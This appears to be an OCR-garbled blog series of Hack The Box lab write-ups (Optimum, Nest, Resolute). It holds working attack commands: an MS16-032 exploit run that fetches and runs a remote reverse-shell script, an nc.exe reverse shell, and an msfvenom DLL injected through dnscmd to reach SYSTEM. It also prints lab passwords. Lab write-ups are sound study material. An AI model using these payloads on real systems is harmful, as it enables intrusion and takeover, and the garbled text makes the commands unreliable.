PS C: Invoke-MS16-ø32 [by b33f öFuzzySec] Operating system core count: 2 Duplicating CreateProcessWithLogonW handle Done, using thread handle: 2472 Sniffing out privileged impersonation token.. Thread belongs to: svchost Thread suspended Wiping current impersonation token Building SYSTEM impersonation token Success, open SYSTEM token handle: 2468 Resuming thread.. Sniffing out SYSTEM shell.. Duplicating SYSTEM token Starting token race Starting process race Holy handle leak Batman, we have a SYSTEM shell! ! PS C: whoami optimum\kostas

So we can use this modified MS16-032 that accepts commands.

To use this you have to edit the bottom to run the function that you want with the specified argument as the script states:

Return $ca11Resu1t - - [Kerne132] : : Terminateprocess($processlnfo.hprocess, $Ca11Resu1t [Kerne132] : $Ca11Resu1t [Kerne132] : $StartTokenRace .stop( ) $SafeGuard .Stop( ) 1) Invoke-MS16032 -Command "iex(New-Object Net .WebC1ient) .DownIoadString( 'http://1Ø.1Ø.14.3Ø/rev4445.psQ' )"

Create another reverse tcp script with a different port (I called mine rev4445.ps1)

Running it:

PS C: Net .WebC1ient) .down10adString( 'http://1Ø.1Ø.14.3Ø/Invoke-MS 16032 .psl') [by b33f [!] Holy handle leak Batman, PS C: öFuzzySec] we have a SYSTEM shell!!

And on our other listener that we set up on port 4445, we get a NT AUTHORITY\SYSTEM shell:

kalih)hvd3: "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.8/scans$ rlwrap nc listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49325 Windows PowerSheII running as user SYSTEM on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS C: nt authority\system PS C: -nvlp 4445

Nest – No Metasploit

Definitely learned a new thing or two with this box. Anyway, let’s fire off nmap:

Okay… so let’s go look at port 4386 to try to see what it is.

HQK Reporting Service? Erm. Ok. Port 445 was open so let’s run smbclient to list the shares and smbmap to list the contents:

kaliö)hyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.178/scans$ cat smbclient.txt WARNING: The "syslog" option is deprecated Sharename ADMIN$ c$ Data IPC$ Secure$ Users Type Disk Disk Disk 1 pc Disk Disk Commen t Remote Admin Default share Remote IPC
ADMIN$ c$ Data dr--r--r 5 17 dr--r--r 7 15:07:51 7 15:07:51 7 15:07:51 7 15:07:33 7 15:07:33 7 15:07:33 7 15:07:32 •55:36 dr--r--r dr--r--r-- •56: 02 Wed Wed Wed Mon Mon Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Wed Sat Sat Fri Sun Thu Thu Wed Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Jan Jan Aug Jan Aug Aug Aug 25 25 26 8 8 7 18. 7 18. 7 18. 02 . 13. 7 18. •53 •53. 13 : 29 • 02 . : 46 • 46 • 41 : 44 •56 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2020 2020 2019 2020 2019 2019 2019 NO ACCESS NO ACCESS READ ONLY IT Production Reports Shared Maintenance Templates Remote Admin Default share dr--r--r-- dr--r--r-- dr--r--r- dr--r--r-- . \Data dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- fr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- dr--r--r-- fr--r--r-- IPC$ Secure$ Users dr--r--r-- dr--r--r- dr--r--r- dr--r--r-- dr--r--r- 48 425 Maintenance Alerts. txt HR Marketing Welcome Email . txt NO ACCESS NO ACCESS READ ONLY Administrator C. Smi th L. Frost R. Thompson TempUser Remote IPC

What’s in Welcome Email.txt?

Cool. So we got a password. No… don’t go trying to use it just yet. Continue enumerating.

Looking at NotepadPlusPlus config.xml:

Looking at RU_config.xml:

… and that’s why we continue to enumerate FIRST.

Okay so, trying the creds that we’ve found so far… we figure out a couple things.

TempUser can get access with welcome2019

So can L.Frost!, but L.Frost can only login with welcome2019, not list shares for some reason (access denied)

Same with R.Thompson…

User: C.Smith and Password: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= can list contents in Secure$\IT\Carl\ directory with TempUser

kaliöhyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.178/scans$ smbclient -U TempUser WARNING: The "syslog" option is deprecated Enter WORKGROUP\TempUser's password : Try "help" to get a list of possible commands. smb: recurse on smb: Is 7 15 : 40: 13 7 15 : 42: 14 7 15 : 42 7 15 7 15 7 15 7 15 : 44: 16 Finance HR IT \Finance NT STATUS NT STATUS NT STATUS ACCESS ACCESS ACCESS DENIED DENIED DENIED listing listing listing smb: cd smb: Is Docs Reports VB Projects \Docs ip.txt MC . txt \Reports 56 73 Wed Wed Wed Wed Thu Wed Wed Wed Tue Tue Wed Wed Wed Wed Tue Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug Aug 8 6 6 6 09 10 7 15:43 09 06:59:25 : 45 : 41 : 45 : 40 : 55 : 42 : 40 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019 2019

With the encrypted password, RUScanner had vb files (Module1.vb) with an example of how to decrypt the password

kaliöhyd3 . —"Documents/htb/nest/smb/secure/wscanner$ cat Modulel.vb Module Modulel Sub Main() Dim Config As ConfigFiIe ConfigFi1e.LoadFromFiIe( "RU_Config.xm1") Dim test As New Ssolntegration With {.Username Config. Username, . Password End Sub End Module Utils . Decryptstring(config.password)}
'kaliöhyd3 : "Documents/htb/nest/smb/secure/wscanner$ cat Ssolntegration .vb Public Class Ssolntegration Public Property Username As String Public Property Password As String End Class
kaliö)hyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ cat ConfigFiIe.vb Public Class ConfigFi1e Public Property Port As Integer Public Property Username As String Public Property Password As String Public Sub SaveToFiIe(path As String) Using File As New 10. FileStream(Path, 10. FileMode.Create) Dim Writer As New XmI.SeriaIization Writer .Seria1ize(Fi1e, Me) End Using End Sub Public Shared Function LoadFromFi1e(ByVa1 FilePath As String) As ConfigFi1e Using File As New 10.FiIeStream(Fi1ePath, 10.FiIeMode.Open) Dim Reader As New Xml. Serialization Return DirectCast(Reader. Deseria1ize(Fi1e), ConfigFi1e) End Using End Function End Class

Utils.vb had the actual code to decrypt the password

kaliöhyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ cat Utils . vb "N3st22", "88552299", 2, "464R5DFA5DL6LE28% 256) Imports System. Text Imports System. Security .Cryptography Public Class Utils Public Shared Function GetLogFi1epath() As String Return 10. Path .Combine(Environment .CurrentDirectory , End Function "Log. txt") Public Shared Function Decryptstring(EncryptedString As String) As String If String.IsNu110rEmpty(EncryptedString) Then Return String. Empty Else Return Decrypt(EncryptedString, End If End Function Public Shared Function Encryptstring(PIainString As String) If String.IsNu110rEmpty(P1ainString) Then As String Return String. Empty Else Return Encrypt(PIainString, End If End Function Public Shared Function Encrypt(ByVa1 plainText As String, _ ByVa1 passPhrase As String, _ ByVaI saltVa1ue As String, _ ByVaI passwordlterations As BvVa1 initVector As String. "N3st22", "88552299", 2, "464R5DFA5DL6LE28% 256) Integer, _

So I needed a nudge on this because this is all REALLY out of my brain capacity (but wouldn’t be for long!)… this involved A LOT of trial and error:

Cutting and pasting the code on .net Fiddle  (https://dotnetfiddle.net) and removing all the unnecessary (non encrypting related functions) and adding Imports System at the top (to get rid of the errors and import necessary classes/modules/etc to make the code work) and adding  Console.WriteLine(plainText) before the decrypt function returns gave us this code:

That last portion was used to just decrypt the actual string that we found earlier. This returned the password:

Sub Yarn ( ) 21m test As New Ssclntegratlcn Kith End sub End Class s xRxRx { . Username = "c. sm.1 th", . Password Utils . DecryptStr1ng ( Last Run: 10:00:46 pm

The password is: xRxRxPANCAK3SxRxRx

Using this, we can try to access the share with C.Smith’s username:

kalijhyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ smbclient WARNING: The "syslog" option is deprecated Enter WORKGROUP\c . smith's password: Try "help" to get a list of possible commands. -U c.smith smb: recurse ON smb: dir Administrator C. Smi th L. Frost R. Thompson TempUser \Administrator NT_STATUS_ACCESS DENIED listing XC. Smi th HQK Reporting user. txt Sat Sat Fri Sun Thu Thu Wed Sun Sun Thu Thu Jan Jan Aug Jan Aug Aug Aug Jan Jan Aug Aug 25 25 26 8 8 02 . 7 18:55 13 : 03 : 01 13 : 50 : 56 26 26 8 8 02 02 . : 21 19:06:17 : 44 : 44 32 2020 2020 2019 2020 2019 2019 2019 2020 2020 2019 2019

We can then just download user.txt and read it:

smb : smb : type: smb : \ > cd C.Smith\ type user. txt command not found get user. txt /home/kaIi/Documents/htb/nest/user. txt getting file of size 32 as /home/ka1i/Documents/htb/nest/user.txt (0.2 KiloBytes/ sec) (average 0.2 KiloBytes/sec)

Now onto root. Looking around, we see some interesting files in HQK Reporting

smb: 7 19 : 41: 16 dir AD Integration Module Debug Mode Password . txt xmI Reporting\AD HqkLdap. exe A Module 249 Integration Thu Thu Fri Thu Thu Fri Fri Wed Aug Aug Aug Aug Aug Aug Aug Aug 8 8 8 8 9 9 08. 08. 9 08. 19:06:17 19:06:17 19:08:17 19 : 09 : 05 .18. .18. 42 • 42 A 17408 2019 2019 2019 2019 2019 2019 2019 2019

HQK_Config_Backup.xml contents:

Looking a bit at Debug Mode Password.txt, it looks interesting. After looking for hours, I remembered about using alternate data streams to hide stuff in files.

smb: alt-name: DEBUGM-I.TXT create time: access time: write time: change_time: Thu Aug 8 Thu Aug 8 Thu Aug 8 Thu Aug 8 allinfo PM PM PM PM bytes "Debug Mode Password . txt" 2019 EDT 2019 EDT 2019 EDT 2019 EDT -attributes: A (20) stream: [ : :$DATA], bytes stream: [ : Password : $DATA] , 15

Interesting… so there’s a stream called Password!

smb: Smith\HQK get "Debug Mode Password . txt" :Password /home/kaIi/Documents/htb/nest/ -c . smith/passwordhidden . txt getting file Smith\HQK Reporting\Debug Mode Password .txt:Password of size 15 as /home/ka1i/Docum ents/htb/nest/c. smith/passwordhidden. txt (0.1 KiloBytes/sec) (average 24.8 KiloBytes/sec)

Okay, so we know this is associated with the HQK service on port 4386. Let’s try to telnet with these creds:

Reading the manual for HQK Reporting Service, we can figure out the commands used to enumerate what is on the service.

>SETDIR . Current directory set to HQK >LIST Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR co man d QUERY FILES IN CURRENT DIRECTORY [DIR] [DIR] [DIR] [1] [2] [3] ALL QUERIES LDAP Logs HqkSvc . exe HqkSvc . InstallState HQK_Con fi g. xm1 Current Directory: HQK
Current >SETDIR Current >list Use the man d Directory: HQK LDAP directory set to LDAP query ID numbers below with the RUNQUERY command and the directory names with the SETDIR co QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap. exe [2] Ldap. conf Current Directory: LDAP
>SHOWQUERY 2 Domain-nest .10ca1 Port-389 BaseOu=OU=WBQ Users , DC-nest , DC-Iocal User-Administrator

To be continued…

Resolute – No Metasploit

Doing initial nmap recon, we get some lengthy output:

PORT 53/tcp 88/tcp 135/tcp 139/tcp 389/tcp 445/tcp 464/tcp 593/tcp 636/tcp 3268/tcp 3269/tcp 5985/tcp STATE open open open open open open open open open open open open SERVICE domain? kerberos-sec msrpc netbios-ssn Idap microsoft-ds kpasswd5? ncacn_http tcpwrapped Idap tcpwrapped http REASON syn syn syn syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack 127 127 127 127 127 127 127 127 127 127 127 127 VERSION Microsoft Windows Kerberos (server time: 2020-05-19 20: øø: 38Z) Microsoft Windows RPC Microsoft Windows netbios-ssn Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) Microsoft Windows RPC over HTTP I.ø Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnp) .NET Message Framing Default-First-Site-Name) Default-First-Site-Name) l_http-server-header: Microsoft-HTTPAPI/2.0 I _http-title: Not Found 9389/tcp open mc-nmf 47ØØ1/tcp open http syn-ack tt1 127 syn-ack tt1 127 l_http-server-header: Microsoft-HTTPAPI/2.0 I _http-title: Not Found 49664/tcp 49665/tcp 49666/tcp 49667/tcp 49671/tcp 49676/tcp 49677/tcp 49688/tcp 49712/tcp 5519Ø/tcp open open open open open open open open open open msrpc msrpc msrpc msrpc msrpc ncacn_http msrpc msrpc msrpc unknown syn syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack 127 127 127 127 127 127 127 127 127 127 Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft HTTPAPI Windows Windows Windows Windows Windows Windows Windows Windows Windows httpd 2.0 (SSDP/UPnp) RPC RPC RPC RPC RPC RPC over HTTP 1.0 RPC RPC RPC Aggressive OS guesses: Microsoft 10 1507 (93%), Microsoft Windows 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows Windows Server 2016 build 10586 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%) 10 1507 - , Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ) .

So it looks like it’s a Windows box with quite a lot of ports open. My eye first caught Ports 139/445. So using enum4linux against resolute, we get some interesting information. I missed this the first time, but looking back over everything line-by-line, I was able to find some really juicy info:

Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) has has has has has has has has has has has has has has has has has has has has has has has has has has member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : MEGABANK\Administrator MEGABANK\DefauI tAccount MEGABANK\krbtgt MEGABANK\ryan MEGABANK\marko MEGABANK\sunita MEGABANK\abigai1 MEGABANK\marcus MEGABANK\sa1ty MEGABANK\fred MEGABANK\angeIa MEGABANK\feIicia MEGABANK\gustavo MEGABANK\u1f MEGABANK\stevie MEGABANK\c1aire MEGABANK\pau10 MEGABANK\steve MEGABANK\annette MEGABANK\annika MEGABANK\per MEGABANK\cmaude MEGABANK\me1anie MEGABANK\zach MEGABANK\simon MEGABANK\naoki
index: øx1øa9 RID: øx457 acb: øxøøøøø21ø Account: . Password set to Welcome123! marko Name: Marko Novak Desc : Account created

Okay so we see Marko Novak’s password is set to Welcome123! Trying this with evil-winrm to login, we get an authentication failure. However, let’s think this through. This looks like the default password created for new users. Running down the list, we try this with the user melanie

sudo evil-winrm -p Evil-WinRM shell v2.3 -i 10.10.10.169 -u melanie 'Welcome123! ' Info: Establishing connection to remote endpoint PS C: cd . PS C: dir -WinRb1*•

So from here, I actually used Powershell and uploaded nc.exe to get a more stable shell. Call me old-fashioned, but I just don’t like the Evil-WinRM shell.

PS C: Start-process 'C: .exe' umentList '-e cmd.exe 10.10.14.22 "3' -Arg
sudo nc -nvlp 443 listening on [any] 1+1+3 connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 53534 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved . C: \Users

I don’t remember quite why, but I ended up using Evil-WinRM’s shell anyway. It’s good to have a backup.

Looking around, we find an unusual file under C:\ called “PSTranscripts”. We enumerated hidden files with dir -FORCE from the PowerShell prompt to find PSTranscripts.

ps C: type PowerShe11_transcript .RESOLUTE.OJuoBGhU.2ø1912ø3ø632ø1.txt Windows PowerSheII transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393 .ø) Host Application: C: . exe -Embedding Process ID: 2800 psversion: 5.1.14393.2273 PSEdition: Desktop PSCompatib1eVersions: I.ø, 2.0 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42øøø WSManStackVersion: 3.0 PSRemotingProtoc01Version: 2.3 SerializationVersion: 1.1.ø.1 , 3.0 , 4.0, 5.0, 5.1.14393.2273 Command start time: 20191203063455 PS>TerminatingError(): "System error. " ComandInvocation(Invoke-Expression): "Invoke-Expression " ParameterBinding(Invoke-Expression): name= "Command" ; value- " if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } CommandInvocation(Out-String): "Out-string" ParameterBinding(Out-String): name* "Stream"; value- "True" Command start time: 20191203063455 PS>ParameterBinding(Out-String): name* "InputObject" ; PS megabank\ryanöRESOLUTE Documents> ' ,$(whoami), ,$env:computername,' ' $pwd) .Name), ' ) - PS megabank\ryanöRESOLUTE Documents> value- "
Command start time: 20191203063515 " Invoke-Expression " ParameterBinding(Invoke-Expression): name- "Command" ; value-"cmd /c net use X: if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } CommandInvocation(Out-String): "Out-string" ParameterBinding(Out-String): name* "Stream"; value-" - True" Windows PowerSheII transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393 .ø) Host Application: C: . exe -Embedding ryan Serv3r4Admin4cc123! Process ID: 2800 psversion: 5.1.14393.2273 PSEdition: Desktop PSCompatib1eVersions: 1.0, 2.0 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42øøø WSManStackVersion: 3.0 PSRemotingProtocoIVersion: 2.3 SerializationVersion: 1.1.ø.1 , 3.0 , 4.0, 5.0, 5.1.14393.2273 Command start time: 20191203063515 "Out-string" ParameterBinding(Out-String): ; cmd : The syntax of this command is: At line:l char:l value* "The syntax of this command is:" + cmd /c net use X: ryan Serv3r4Admin4cc123! + Categorylnfo NotSpecified: (The syntax of this command is: :string) [ ] , + FullyQua1ifiedErrorId NativeComandError cmd : The syntax of this command is: At line:l char:l + cmd /c net use X: ryan Serv3r4Admin4cc123! RemoteException RemoteException + Categorylnfo + FullyQua1ifiedErrorId Windows PowerShe11 transcript start time: 20191203063515 NotSpecified: (The syntax of this command is: :string) [ ] , NativeComandError start

Did you see it? ryan’s password is in the other transcript file! Password: Serv3r4Admin4cc123!

Let’s try these creds with ryan:

Alright, time to look around. We enumerated around, looking at basic stuff like whoami /groups

GROUP INFORMATION Group Name Everyone BUILTIN\Users BUILTIN\Pre-Windows 2øøø Compatible PS C: whoami /groups s-l-l-ø 32—545 —32—554 s-1-5-32-580 s-1 s-1-5-11 s-1-5-15 s 5-64-10 Access BUILTIN\Remote Management Users NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization MEGABANK\Contractors MEGABANK\DnsAdmins NT AUTHORITY\NTLM Authentication Mandatory Label\Medium Mandatory Type Well-known Alias Alias Alias Well-known Well-known Well-known Group Alias Well-known Label group group group group group SID s-1-5- s-1-5 s-1-5-21-1392959593-3013219662-3596683436-1103 s-1-5-21-1392959593-3013219662-3596683436-1101 s-1-16-8192 Attributes Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory group , group , group , group , group , group , group , group , group , group , Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled by by by by by by by by by by default, default, default, default, default, default, default, default, default, default, Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled group group group group group group group group group, Local Group group Level

After a while, I came up with nothing. I used PowerUp.ps1 to find an interesting potential exploit:

HijackabIePath : C: AbuseFunction . Write-HijackDII -OutputFiIe 'C: . dll' -Command

This link actually helped me out a lot in understanding what to do next.

So, I created a malicious DLL:

kaliö)hyd3 . —"Documents/htb/resolute$ msfvenom -p L HOST=1ø.1ø.14.22 LPORT=443 -a -f -o wibsctrl.dll [-] No platform was selected, choosing Msf: :Modu1e: :P1atform: :Windows from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dil file: 5120 bytes Saved as: wlbsctrl .dII

Then I served it up on SMB:

kaliö)hyd3: "Documents/htb/resolute$ sudo python3 /usr/share/doc/python3-impacket/exampIes/smbserver .py ROPNOP /home/kaIi/Documents/htb/resoIute/ Impacket vø.9 .21 - Copyright 2020 SecureAuth Corporation

And I injected the DLL remotely (really cool new trick I didn’t know before):

PS C: dnscmd .exe RESOLUTE /config /serverlevelplugindll Registry property server1eve1p1ugind11 successfully reset . Command completed successfully. PS C: sc . exe stop dns SERVICE NAME: dns TYPE STATE WIN32 EXIT CODE SERVICE EXIT CODE CHECKPOINT WAIT HINT 10 WIN32 OWN PROCESS 3 STOP PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) (øxø) (øxø) øxø øxø PS C: sc . exe start dns

I then started the DNS process as seen above. With the listener on port 443, I caught an NT AUTHORITY\SYSTEM shell:

listening on [any] 1+1+3 . connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 52809 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved . C: \Windows whoami nt authority\system C: C: . txt type C: . txt The system cannot find the file specified. cd C: C: Desktop\root . txt type Desktop\root . txt eld94876a5ø685ødøc2øedb5W5e619c